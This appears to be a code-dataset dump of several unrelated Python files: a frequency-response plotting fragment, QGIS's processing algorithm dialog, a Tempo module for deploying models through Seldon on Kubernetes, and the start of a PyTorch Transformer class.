imported_Xvalues = data[:,0]
if self.plotAbs:
imported_Yvalues = np.abs(data[:,1] + 1j*data[:,2])
elif self.plotReal:
imported_Yvalues = data[:,1]
elif self.plotImag:
imported_Yvalues = data[:,2]
if self.plotAbs:
response = np.abs(response)
ax.set_ylabel(("Structural Response - Absolute [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
if not float(0) in response:
if self.imported_data is None:
ax.set_yscale('log', nonposy='clip')
else:
if not float(0) in imported_Yvalues:
ax.set_yscale('log', nonposy='clip')
elif self.plotReal:
response = np.real(response)
ax.set_ylabel(("Structural Response - Real [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
elif self.plotImag:
response = np.imag(response)
ax.set_ylabel(("Structural Response - Imaginary [{}]").format(self.unit_label), fontsize = 14, fontweight = 'bold')
#cursor = Cursor(ax)
cursor = SnaptoCursor(ax, frequencies, response, self.cursor)
plt.connect('motion_notify_event', cursor.mouse_move)
legend_label = "Response {} at node {}".format(self.localdof_label, self.node_ID)
if self.imported_data is None:
if float(0) in response or self.plotReal or self.plotImag:
if float(0) in response[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
_legends = plt.legend(handles=[first_plot], labels=[legend_label], loc='upper right')
else:
if float(0) in response or float(0) in imported_Yvalues or self.plotReal or self.plotImag:
if float(0) in response[1:] or float(0) in imported_Yvalues[1:] or self.plotReal or self.plotImag:
first_plot, = plt.plot(frequencies, response, color=[1,0,0], linewidth=2)
second_plot, = plt.plot(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies[1:], response[1:], color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues[1:], imported_Yvalues[1:], color=[0,0,1], linewidth=1, linestyle="--")
else:
first_plot, = plt.semilogy(frequencies, response, color=[1,0,0], linewidth=2, label=legend_label)
second_plot, = plt.semilogy(imported_Xvalues, imported_Yvalues, color=[0,0,1], linewidth=1, linestyle="--")
_legends = plt.legend(handles=[first_plot, second_plot], labels=[legend_label, self.legend_imported], loc='upper right')
plt.gca().add_artist(_legends)
ax.set_title(('STRUCTURAL FREQUENCY RESPONSE - {}').format(self.analysisMethod.upper()), fontsize = 16, fontweight = 'bold')
ax.set_xlabel(('Frequency [Hz]'), fontsize = 14, fontweight = 'bold')
plt.show()
| 0.560253 | 0.234024 |
__author__ = '<NAME>'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, <NAME>'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
import os
from pprint import pformat
import time
from qgis.PyQt.QtCore import QCoreApplication, Qt
from qgis.PyQt.QtWidgets import QMessageBox, QPushButton, QSizePolicy, QDialogButtonBox
from qgis.PyQt.QtGui import QColor, QPalette
from qgis.core import (Qgis,
QgsProject,
QgsApplication,
QgsProcessingUtils,
QgsProcessingParameterDefinition,
QgsProcessingAlgRunnerTask,
QgsProcessingOutputHtml,
QgsProcessingParameterVectorDestination,
QgsProcessingOutputLayerDefinition,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterRasterDestination,
QgsProcessingAlgorithm,
QgsProcessingParameters,
QgsProxyProgressTask,
QgsTaskManager)
from qgis.gui import (QgsGui,
QgsMessageBar,
QgsProcessingAlgorithmDialogBase)
from qgis.utils import iface
from processing.core.ProcessingLog import ProcessingLog
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.ProcessingResults import resultsList
from processing.gui.ParametersPanel import ParametersPanel
from processing.gui.BatchAlgorithmDialog import BatchAlgorithmDialog
from processing.gui.AlgorithmDialogBase import AlgorithmDialogBase
from processing.gui.AlgorithmExecutor import executeIterating, execute, execute_in_place
from processing.gui.Postprocessing import handleAlgorithmResults
from processing.gui.wrappers import WidgetWrapper
from processing.tools import dataobjects
class AlgorithmDialog(QgsProcessingAlgorithmDialogBase):
def __init__(self, alg, in_place=False, parent=None):
super().__init__(parent)
self.feedback_dialog = None
self.in_place = in_place
self.active_layer = None
self.context = None
self.feedback = None
self.setAlgorithm(alg)
self.setMainWidget(self.getParametersPanel(alg, self))
if not self.in_place:
self.runAsBatchButton = QPushButton(QCoreApplication.translate("AlgorithmDialog", "Run as Batch Process…"))
self.runAsBatchButton.clicked.connect(self.runAsBatch)
self.buttonBox().addButton(self.runAsBatchButton, QDialogButtonBox.ResetRole) # reset role to ensure left alignment
else:
self.active_layer = iface.activeLayer()
self.runAsBatchButton = None
has_selection = self.active_layer and (self.active_layer.selectedFeatureCount() > 0)
self.buttonBox().button(QDialogButtonBox.Ok).setText(QCoreApplication.translate("AlgorithmDialog", "Modify Selected Features")
if has_selection else QCoreApplication.translate("AlgorithmDialog", "Modify All Features"))
self.buttonBox().button(QDialogButtonBox.Close).setText(QCoreApplication.translate("AlgorithmDialog", "Cancel"))
self.setWindowTitle(self.windowTitle() + ' | ' + self.active_layer.name())
def getParametersPanel(self, alg, parent):
return ParametersPanel(parent, alg, self.in_place)
def runAsBatch(self):
self.close()
dlg = BatchAlgorithmDialog(self.algorithm().create(), parent=iface.mainWindow())
dlg.show()
dlg.exec_()
def setParameters(self, parameters):
self.mainWidget().setParameters(parameters)
def getParameterValues(self):
parameters = {}
if self.mainWidget() is None:
return parameters
for param in self.algorithm().parameterDefinitions():
if param.flags() & QgsProcessingParameterDefinition.FlagHidden:
continue
if not param.isDestination():
if self.in_place and param.name() == 'INPUT':
parameters[param.name()] = self.active_layer
continue
try:
wrapper = self.mainWidget().wrappers[param.name()]
except KeyError:
continue
# For compatibility with 3.x API, we need to check whether the wrapper is
# the deprecated WidgetWrapper class. If not, it's the newer
# QgsAbstractProcessingParameterWidgetWrapper class
# TODO QGIS 4.0 - remove
if issubclass(wrapper.__class__, WidgetWrapper):
widget = wrapper.widget
else:
widget = wrapper.wrappedWidget()
if widget is None:
continue
value = wrapper.parameterValue()
parameters[param.name()] = value
if not param.checkValueIsAcceptable(value):
raise AlgorithmDialogBase.InvalidParameterValue(param, widget)
else:
if self.in_place and param.name() == 'OUTPUT':
parameters[param.name()] = 'memory:'
continue
dest_project = None
if not param.flags() & QgsProcessingParameterDefinition.FlagHidden and \
isinstance(param, (QgsProcessingParameterRasterDestination,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterVectorDestination)):
if self.mainWidget().checkBoxes[param.name()].isChecked():
dest_project = QgsProject.instance()
widget = self.mainWidget().outputWidgets[param.name()]
value = widget.getValue()
if value and isinstance(value, QgsProcessingOutputLayerDefinition):
value.destinationProject = dest_project
if value:
parameters[param.name()] = value
if param.isDestination():
context = dataobjects.createContext()
ok, error = self.algorithm().provider().isSupportedOutputValue(value, param, context)
if not ok:
raise AlgorithmDialogBase.InvalidOutputExtension(widget, error)
return self.algorithm().preprocessParameters(parameters)
def runAlgorithm(self):
self.feedback = self.createFeedback()
self.context = dataobjects.createContext(self.feedback)
checkCRS = ProcessingConfig.getSetting(ProcessingConfig.WARN_UNMATCHING_CRS)
try:
parameters = self.getParameterValues()
if checkCRS and not self.algorithm().validateInputCrs(parameters, self.context):
reply = QMessageBox.question(self, self.tr("Unmatching CRS's"),
self.tr('Parameters do not all use the same CRS. This can '
'cause unexpected results.\nDo you want to '
'continue?'),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply == QMessageBox.No:
return
ok, msg = self.algorithm().checkParameterValues(parameters, self.context)
if not ok:
QMessageBox.warning(
self, self.tr('Unable to execute algorithm'), msg)
return
self.runButton().setEnabled(False)
self.cancelButton().setEnabled(False)
buttons = self.mainWidget().iterateButtons
self.iterateParam = None
for i in range(len(list(buttons.values()))):
button = list(buttons.values())[i]
if button.isChecked():
self.iterateParam = list(buttons.keys())[i]
break
self.clearProgress()
self.feedback.pushVersionInfo(self.algorithm().provider())
self.setProgressText(QCoreApplication.translate('AlgorithmDialog', 'Processing algorithm…'))
self.setInfo(
QCoreApplication.translate('AlgorithmDialog', '<b>Algorithm \'{0}\' starting…</b>').format(self.algorithm().displayName()), escapeHtml=False)
self.feedback.pushInfo(self.tr('Input parameters:'))
display_params = []
for k, v in parameters.items():
display_params.append("'" + k + "' : " + self.algorithm().parameterDefinition(k).valueAsPythonString(v, self.context))
self.feedback.pushCommandInfo('{ ' + ', '.join(display_params) + ' }')
self.feedback.pushInfo('')
start_time = time.time()
if self.iterateParam:
# Make sure the Log tab is visible before executing the algorithm
try:
self.showLog()
self.repaint()
except:
pass
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
if executeIterating(self.algorithm(), parameters, self.iterateParam, self.context, self.feedback):
self.feedback.pushInfo(
self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.cancelButton().setEnabled(False)
self.finish(True, parameters, self.context, self.feedback)
else:
self.cancelButton().setEnabled(False)
self.resetGui()
else:
command = self.algorithm().asPythonCommand(parameters, self.context)
if command:
ProcessingLog.addToLog(command)
QgsGui.instance().processingRecentAlgorithmLog().push(self.algorithm().id())
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
def on_complete(ok, results):
if ok:
self.feedback.pushInfo(self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo(self.tr('Results:'))
self.feedback.pushCommandInfo(pformat(results))
else:
self.feedback.reportError(
self.tr('Execution failed after {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo('')
if self.feedback_dialog is not None:
self.feedback_dialog.close()
self.feedback_dialog.deleteLater()
self.feedback_dialog = None
self.cancelButton().setEnabled(False)
if not self.in_place:
self.finish(ok, results, self.context, self.feedback)
elif ok:
self.close()
self.feedback = None
self.context = None
if not self.in_place and not (self.algorithm().flags() & QgsProcessingAlgorithm.FlagNoThreading):
# Make sure the Log tab is visible before executing the algorithm
self.showLog()
task = QgsProcessingAlgRunnerTask(self.algorithm(), parameters, self.context, self.feedback)
if task.isCanceled():
on_complete(False, {})
else:
task.executed.connect(on_complete)
self.setCurrentTask(task)
else:
self.proxy_progress = QgsProxyProgressTask(QCoreApplication.translate("AlgorithmDialog", "Executing “{}”").format(self.algorithm().displayName()))
QgsApplication.taskManager().addTask(self.proxy_progress)
self.feedback.progressChanged.connect(self.proxy_progress.setProxyProgress)
self.feedback_dialog = self.createProgressDialog()
self.feedback_dialog.show()
if self.in_place:
ok, results = execute_in_place(self.algorithm(), parameters, self.context, self.feedback)
else:
ok, results = execute(self.algorithm(), parameters, self.context, self.feedback)
self.feedback.progressChanged.disconnect()
self.proxy_progress.finalize(ok)
on_complete(ok, results)
except AlgorithmDialogBase.InvalidParameterValue as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
self.messageBar().clearWidgets()
self.messageBar().pushMessage("", self.tr("Wrong or missing parameter value: {0}").format(e.parameter.description()),
level=Qgis.Warning, duration=5)
except AlgorithmDialogBase.InvalidOutputExtension as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
self.messageBar().clearWidgets()
self.messageBar().pushMessage("", e.message,
level=Qgis.Warning, duration=5)
def finish(self, successful, result, context, feedback):
keepOpen = not successful or ProcessingConfig.getSetting(ProcessingConfig.KEEP_DIALOG_OPEN)
if self.iterateParam is None:
# add html results to results dock
for out in self.algorithm().outputDefinitions():
if isinstance(out, QgsProcessingOutputHtml) and out.name() in result and result[out.name()]:
resultsList.addResult(icon=self.algorithm().icon(), name=out.description(), timestamp=time.localtime(),
result=result[out.name()])
if not handleAlgorithmResults(self.algorithm(), context, feedback, not keepOpen, result):
self.resetGui()
return
self.setExecuted(True)
self.setResults(result)
self.setInfo(self.tr('Algorithm \'{0}\' finished').format(self.algorithm().displayName()), escapeHtml=False)
if not keepOpen:
self.close()
else:
self.resetGui()
if self.algorithm().hasHtmlOutputs():
self.setInfo(
self.tr('HTML output has been generated by this algorithm.'
'\nOpen the results dialog to check it.'), escapeHtml=False)
|
python/plugins/processing/gui/AlgorithmDialog.py
|
__author__ = '<NAME>'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, <NAME>'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
import os
from pprint import pformat
import time
from qgis.PyQt.QtCore import QCoreApplication, Qt
from qgis.PyQt.QtWidgets import QMessageBox, QPushButton, QSizePolicy, QDialogButtonBox
from qgis.PyQt.QtGui import QColor, QPalette
from qgis.core import (Qgis,
QgsProject,
QgsApplication,
QgsProcessingUtils,
QgsProcessingParameterDefinition,
QgsProcessingAlgRunnerTask,
QgsProcessingOutputHtml,
QgsProcessingParameterVectorDestination,
QgsProcessingOutputLayerDefinition,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterRasterDestination,
QgsProcessingAlgorithm,
QgsProcessingParameters,
QgsProxyProgressTask,
QgsTaskManager)
from qgis.gui import (QgsGui,
QgsMessageBar,
QgsProcessingAlgorithmDialogBase)
from qgis.utils import iface
from processing.core.ProcessingLog import ProcessingLog
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.ProcessingResults import resultsList
from processing.gui.ParametersPanel import ParametersPanel
from processing.gui.BatchAlgorithmDialog import BatchAlgorithmDialog
from processing.gui.AlgorithmDialogBase import AlgorithmDialogBase
from processing.gui.AlgorithmExecutor import executeIterating, execute, execute_in_place
from processing.gui.Postprocessing import handleAlgorithmResults
from processing.gui.wrappers import WidgetWrapper
from processing.tools import dataobjects
class AlgorithmDialog(QgsProcessingAlgorithmDialogBase):
def __init__(self, alg, in_place=False, parent=None):
super().__init__(parent)
self.feedback_dialog = None
self.in_place = in_place
self.active_layer = None
self.context = None
self.feedback = None
self.setAlgorithm(alg)
self.setMainWidget(self.getParametersPanel(alg, self))
if not self.in_place:
self.runAsBatchButton = QPushButton(QCoreApplication.translate("AlgorithmDialog", "Run as Batch Process…"))
self.runAsBatchButton.clicked.connect(self.runAsBatch)
self.buttonBox().addButton(self.runAsBatchButton, QDialogButtonBox.ResetRole) # reset role to ensure left alignment
else:
self.active_layer = iface.activeLayer()
self.runAsBatchButton = None
has_selection = self.active_layer and (self.active_layer.selectedFeatureCount() > 0)
self.buttonBox().button(QDialogButtonBox.Ok).setText(QCoreApplication.translate("AlgorithmDialog", "Modify Selected Features")
if has_selection else QCoreApplication.translate("AlgorithmDialog", "Modify All Features"))
self.buttonBox().button(QDialogButtonBox.Close).setText(QCoreApplication.translate("AlgorithmDialog", "Cancel"))
self.setWindowTitle(self.windowTitle() + ' | ' + self.active_layer.name())
def getParametersPanel(self, alg, parent):
return ParametersPanel(parent, alg, self.in_place)
def runAsBatch(self):
self.close()
dlg = BatchAlgorithmDialog(self.algorithm().create(), parent=iface.mainWindow())
dlg.show()
dlg.exec_()
def setParameters(self, parameters):
self.mainWidget().setParameters(parameters)
def getParameterValues(self):
parameters = {}
if self.mainWidget() is None:
return parameters
for param in self.algorithm().parameterDefinitions():
if param.flags() & QgsProcessingParameterDefinition.FlagHidden:
continue
if not param.isDestination():
if self.in_place and param.name() == 'INPUT':
parameters[param.name()] = self.active_layer
continue
try:
wrapper = self.mainWidget().wrappers[param.name()]
except KeyError:
continue
# For compatibility with 3.x API, we need to check whether the wrapper is
# the deprecated WidgetWrapper class. If not, it's the newer
# QgsAbstractProcessingParameterWidgetWrapper class
# TODO QGIS 4.0 - remove
if issubclass(wrapper.__class__, WidgetWrapper):
widget = wrapper.widget
else:
widget = wrapper.wrappedWidget()
if widget is None:
continue
value = wrapper.parameterValue()
parameters[param.name()] = value
if not param.checkValueIsAcceptable(value):
raise AlgorithmDialogBase.InvalidParameterValue(param, widget)
else:
if self.in_place and param.name() == 'OUTPUT':
parameters[param.name()] = 'memory:'
continue
dest_project = None
if not param.flags() & QgsProcessingParameterDefinition.FlagHidden and \
isinstance(param, (QgsProcessingParameterRasterDestination,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterVectorDestination)):
if self.mainWidget().checkBoxes[param.name()].isChecked():
dest_project = QgsProject.instance()
widget = self.mainWidget().outputWidgets[param.name()]
value = widget.getValue()
if value and isinstance(value, QgsProcessingOutputLayerDefinition):
value.destinationProject = dest_project
if value:
parameters[param.name()] = value
if param.isDestination():
context = dataobjects.createContext()
ok, error = self.algorithm().provider().isSupportedOutputValue(value, param, context)
if not ok:
raise AlgorithmDialogBase.InvalidOutputExtension(widget, error)
return self.algorithm().preprocessParameters(parameters)
def runAlgorithm(self):
self.feedback = self.createFeedback()
self.context = dataobjects.createContext(self.feedback)
checkCRS = ProcessingConfig.getSetting(ProcessingConfig.WARN_UNMATCHING_CRS)
try:
parameters = self.getParameterValues()
if checkCRS and not self.algorithm().validateInputCrs(parameters, self.context):
reply = QMessageBox.question(self, self.tr("Unmatching CRS's"),
self.tr('Parameters do not all use the same CRS. This can '
'cause unexpected results.\nDo you want to '
'continue?'),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply == QMessageBox.No:
return
ok, msg = self.algorithm().checkParameterValues(parameters, self.context)
if not ok:
QMessageBox.warning(
self, self.tr('Unable to execute algorithm'), msg)
return
self.runButton().setEnabled(False)
self.cancelButton().setEnabled(False)
buttons = self.mainWidget().iterateButtons
self.iterateParam = None
for i in range(len(list(buttons.values()))):
button = list(buttons.values())[i]
if button.isChecked():
self.iterateParam = list(buttons.keys())[i]
break
self.clearProgress()
self.feedback.pushVersionInfo(self.algorithm().provider())
self.setProgressText(QCoreApplication.translate('AlgorithmDialog', 'Processing algorithm…'))
self.setInfo(
QCoreApplication.translate('AlgorithmDialog', '<b>Algorithm \'{0}\' starting…</b>').format(self.algorithm().displayName()), escapeHtml=False)
self.feedback.pushInfo(self.tr('Input parameters:'))
display_params = []
for k, v in parameters.items():
display_params.append("'" + k + "' : " + self.algorithm().parameterDefinition(k).valueAsPythonString(v, self.context))
self.feedback.pushCommandInfo('{ ' + ', '.join(display_params) + ' }')
self.feedback.pushInfo('')
start_time = time.time()
if self.iterateParam:
# Make sure the Log tab is visible before executing the algorithm
try:
self.showLog()
self.repaint()
except:
pass
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
if executeIterating(self.algorithm(), parameters, self.iterateParam, self.context, self.feedback):
self.feedback.pushInfo(
self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.cancelButton().setEnabled(False)
self.finish(True, parameters, self.context, self.feedback)
else:
self.cancelButton().setEnabled(False)
self.resetGui()
else:
command = self.algorithm().asPythonCommand(parameters, self.context)
if command:
ProcessingLog.addToLog(command)
QgsGui.instance().processingRecentAlgorithmLog().push(self.algorithm().id())
self.cancelButton().setEnabled(self.algorithm().flags() & QgsProcessingAlgorithm.FlagCanCancel)
def on_complete(ok, results):
if ok:
self.feedback.pushInfo(self.tr('Execution completed in {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo(self.tr('Results:'))
self.feedback.pushCommandInfo(pformat(results))
else:
self.feedback.reportError(
self.tr('Execution failed after {0:0.2f} seconds').format(time.time() - start_time))
self.feedback.pushInfo('')
if self.feedback_dialog is not None:
self.feedback_dialog.close()
self.feedback_dialog.deleteLater()
self.feedback_dialog = None
self.cancelButton().setEnabled(False)
if not self.in_place:
self.finish(ok, results, self.context, self.feedback)
elif ok:
self.close()
self.feedback = None
self.context = None
if not self.in_place and not (self.algorithm().flags() & QgsProcessingAlgorithm.FlagNoThreading):
# Make sure the Log tab is visible before executing the algorithm
self.showLog()
task = QgsProcessingAlgRunnerTask(self.algorithm(), parameters, self.context, self.feedback)
if task.isCanceled():
on_complete(False, {})
else:
task.executed.connect(on_complete)
self.setCurrentTask(task)
else:
self.proxy_progress = QgsProxyProgressTask(QCoreApplication.translate("AlgorithmDialog", "Executing “{}”").format(self.algorithm().displayName()))
QgsApplication.taskManager().addTask(self.proxy_progress)
self.feedback.progressChanged.connect(self.proxy_progress.setProxyProgress)
self.feedback_dialog = self.createProgressDialog()
self.feedback_dialog.show()
if self.in_place:
ok, results = execute_in_place(self.algorithm(), parameters, self.context, self.feedback)
else:
ok, results = execute(self.algorithm(), parameters, self.context, self.feedback)
self.feedback.progressChanged.disconnect()
self.proxy_progress.finalize(ok)
on_complete(ok, results)
except AlgorithmDialogBase.InvalidParameterValue as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
self.messageBar().clearWidgets()
self.messageBar().pushMessage("", self.tr("Wrong or missing parameter value: {0}").format(e.parameter.description()),
level=Qgis.Warning, duration=5)
except AlgorithmDialogBase.InvalidOutputExtension as e:
try:
self.buttonBox().accepted.connect(lambda e=e:
e.widget.setPalette(QPalette()))
palette = e.widget.palette()
palette.setColor(QPalette.Base, QColor(255, 255, 0))
e.widget.setPalette(palette)
except:
pass
self.messageBar().clearWidgets()
self.messageBar().pushMessage("", e.message,
level=Qgis.Warning, duration=5)
def finish(self, successful, result, context, feedback):
keepOpen = not successful or ProcessingConfig.getSetting(ProcessingConfig.KEEP_DIALOG_OPEN)
if self.iterateParam is None:
# add html results to results dock
for out in self.algorithm().outputDefinitions():
if isinstance(out, QgsProcessingOutputHtml) and out.name() in result and result[out.name()]:
resultsList.addResult(icon=self.algorithm().icon(), name=out.description(), timestamp=time.localtime(),
result=result[out.name()])
if not handleAlgorithmResults(self.algorithm(), context, feedback, not keepOpen, result):
self.resetGui()
return
self.setExecuted(True)
self.setResults(result)
self.setInfo(self.tr('Algorithm \'{0}\' finished').format(self.algorithm().displayName()), escapeHtml=False)
if not keepOpen:
self.close()
else:
self.resetGui()
if self.algorithm().hasHtmlOutputs():
self.setInfo(
self.tr('HTML output has been generated by this algorithm.'
'\nOpen the results dialog to check it.'), escapeHtml=False)
| 0.350755 | 0.09451 |
import json
import time
from typing import Optional, Sequence
import yaml
from kubernetes import client
from kubernetes.client.rest import ApiException
from tempo.k8s.constants import TempoK8sLabel, TempoK8sModelSpecAnnotation
from tempo.k8s.utils import create_k8s_client
from tempo.seldon.endpoint import Endpoint
from tempo.seldon.specs import KubernetesSpec
from tempo.serve.base import DeployedModel, ModelSpec, Runtime
from tempo.serve.metadata import RuntimeOptions
from tempo.serve.stub import deserialize
from tempo.utils import logger
class SeldonCoreOptions(RuntimeOptions):
runtime: str = "tempo.seldon.SeldonKubernetesRuntime"
class SeldonKubernetesRuntime(Runtime):
def __init__(self, runtime_options: Optional[RuntimeOptions] = None):
if runtime_options is None:
runtime_options = RuntimeOptions()
runtime_options.runtime = "tempo.seldon.SeldonKubernetesRuntime"
super().__init__(runtime_options)
def get_endpoint_spec(self, model_spec: ModelSpec) -> str:
create_k8s_client()
endpoint = Endpoint()
return endpoint.get_url(model_spec)
def undeploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
api_instance = client.CustomObjectsApi()
api_instance.delete_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
body=client.V1DeleteOptions(propagation_policy="Foreground"),
)
def deploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
k8s_specer = KubernetesSpec(model_spec)
k8s_spec = k8s_specer.spec
logger.debug(k8s_spec)
api_instance = client.CustomObjectsApi()
try:
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
k8s_spec["metadata"]["resourceVersion"] = existing["metadata"]["resourceVersion"]
api_instance.replace_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
k8s_spec,
)
except ApiException as e:
if e.status == 404:
api_instance.create_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
k8s_spec,
)
else:
raise e
def wait_ready_spec(self, model_spec: ModelSpec, timeout_secs=None) -> bool:
create_k8s_client()
ready = False
t0 = time.time()
while not ready:
api_instance = client.CustomObjectsApi()
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
if "status" in existing and "state" in existing["status"]:
ready = existing["status"]["state"] == "Available"
if timeout_secs is not None:
t1 = time.time()
if t1 - t0 > timeout_secs:
return ready
return ready
def to_k8s_yaml_spec(self, model_spec: ModelSpec) -> str:
k8s_spec = KubernetesSpec(model_spec)
return yaml.safe_dump(k8s_spec.spec)
def list_models(self, namespace: Optional[str] = None) -> Sequence[DeployedModel]:
create_k8s_client()
api_instance = client.CustomObjectsApi()
if namespace is None and self.runtime_options is not None:
namespace = self.runtime_options.k8s_options.namespace
if namespace is None:
return []
try:
models = []
response = api_instance.list_namespaced_custom_object(
group="machinelearning.seldon.io",
version="v1",
namespace=namespace,
plural="seldondeployments",
label_selector=TempoK8sLabel + "=true",
)
for model in response["items"]:
metadata = model["metadata"]["annotations"][TempoK8sModelSpecAnnotation]
remote_model = deserialize(json.loads(metadata))
models.append(remote_model)
return models
except ApiException as e:
if e.status == 404:
return []
else:
raise e
|
tempo/seldon/k8s.py
|
import json
import time
from typing import Optional, Sequence
import yaml
from kubernetes import client
from kubernetes.client.rest import ApiException
from tempo.k8s.constants import TempoK8sLabel, TempoK8sModelSpecAnnotation
from tempo.k8s.utils import create_k8s_client
from tempo.seldon.endpoint import Endpoint
from tempo.seldon.specs import KubernetesSpec
from tempo.serve.base import DeployedModel, ModelSpec, Runtime
from tempo.serve.metadata import RuntimeOptions
from tempo.serve.stub import deserialize
from tempo.utils import logger
class SeldonCoreOptions(RuntimeOptions):
runtime: str = "tempo.seldon.SeldonKubernetesRuntime"
class SeldonKubernetesRuntime(Runtime):
def __init__(self, runtime_options: Optional[RuntimeOptions] = None):
if runtime_options is None:
runtime_options = RuntimeOptions()
runtime_options.runtime = "tempo.seldon.SeldonKubernetesRuntime"
super().__init__(runtime_options)
def get_endpoint_spec(self, model_spec: ModelSpec) -> str:
create_k8s_client()
endpoint = Endpoint()
return endpoint.get_url(model_spec)
def undeploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
api_instance = client.CustomObjectsApi()
api_instance.delete_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
body=client.V1DeleteOptions(propagation_policy="Foreground"),
)
def deploy_spec(self, model_spec: ModelSpec):
create_k8s_client()
k8s_specer = KubernetesSpec(model_spec)
k8s_spec = k8s_specer.spec
logger.debug(k8s_spec)
api_instance = client.CustomObjectsApi()
try:
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
k8s_spec["metadata"]["resourceVersion"] = existing["metadata"]["resourceVersion"]
api_instance.replace_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
k8s_spec,
)
except ApiException as e:
if e.status == 404:
api_instance.create_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
k8s_spec,
)
else:
raise e
def wait_ready_spec(self, model_spec: ModelSpec, timeout_secs=None) -> bool:
create_k8s_client()
ready = False
t0 = time.time()
while not ready:
api_instance = client.CustomObjectsApi()
existing = api_instance.get_namespaced_custom_object(
"machinelearning.seldon.io",
"v1",
model_spec.runtime_options.k8s_options.namespace,
"seldondeployments",
model_spec.model_details.name,
)
if "status" in existing and "state" in existing["status"]:
ready = existing["status"]["state"] == "Available"
if timeout_secs is not None:
t1 = time.time()
if t1 - t0 > timeout_secs:
return ready
return ready
def to_k8s_yaml_spec(self, model_spec: ModelSpec) -> str:
k8s_spec = KubernetesSpec(model_spec)
return yaml.safe_dump(k8s_spec.spec)
def list_models(self, namespace: Optional[str] = None) -> Sequence[DeployedModel]:
create_k8s_client()
api_instance = client.CustomObjectsApi()
if namespace is None and self.runtime_options is not None:
namespace = self.runtime_options.k8s_options.namespace
if namespace is None:
return []
try:
models = []
response = api_instance.list_namespaced_custom_object(
group="machinelearning.seldon.io",
version="v1",
namespace=namespace,
plural="seldondeployments",
label_selector=TempoK8sLabel + "=true",
)
for model in response["items"]:
metadata = model["metadata"]["annotations"][TempoK8sModelSpecAnnotation]
remote_model = deserialize(json.loads(metadata))
models.append(remote_model)
return models
except ApiException as e:
if e.status == 404:
return []
else:
raise e
| 0.68595 | 0.14445 |
import torch
import torch.nn as nn
import torch.nn.functional as F
from layers.Transformer_EncDec import Decoder, DecoderLayer, Encoder, EncoderLayer, ConvLayer
from layers.SelfAttention_Family import FullAttention, AttentionLayer
from layers.Embed import DataEmbedding
import numpy as np
class Transformer(nn.Module):
"""
Vanilla Transformer with O(L^2) complexity
"""
def __init__(self, args):
super(Transformer, self).__init__()
self.args = args
self.pred_len = args.pred_len
self.output_attention = args.output_attention
# Embedding
self.enc_embedding = DataEmbedding(args.enc_in, args.d_model, args.embed, args.freq,
args.dropout)
